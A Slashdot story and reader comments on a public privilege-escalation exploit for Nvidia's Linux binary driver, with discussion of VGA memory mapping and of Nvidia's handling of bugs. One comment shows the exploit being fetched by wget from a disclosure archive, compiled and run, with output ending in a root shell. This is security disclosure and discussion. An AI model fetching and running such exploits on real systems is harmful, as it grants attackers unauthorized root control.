Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole 180
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."
The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
Re:A view to a kill. (Score:5, Informative)
VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).
works here (Score:5, Informative)
It's certainly legit..
c@v:~$ ... ... ./nvid-root
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225]
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#
sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise
sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#
Re:Who did he send it to at Nvidia? (Score:5, Informative)
Yeah you don't get more flimsy evidence than a working exploit.
Re:works here (Score:5, Informative)
[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
Re:A view to a kill. (Score:3, Informative)
Windows 7 still includes a VGA video driver.
Re:Nvidia rotten to the core (Score:5, Informative)
Frankly a root exploit is one of their lesser sins.
Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)
You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.
First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!
Over a year of data loss for anyone that believed them.
Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.
Re:Who did he send it to at Nvidia? (Score:3, Informative)
Re:Nvidia rotten to the core (Score:4, Informative)
I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.
Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??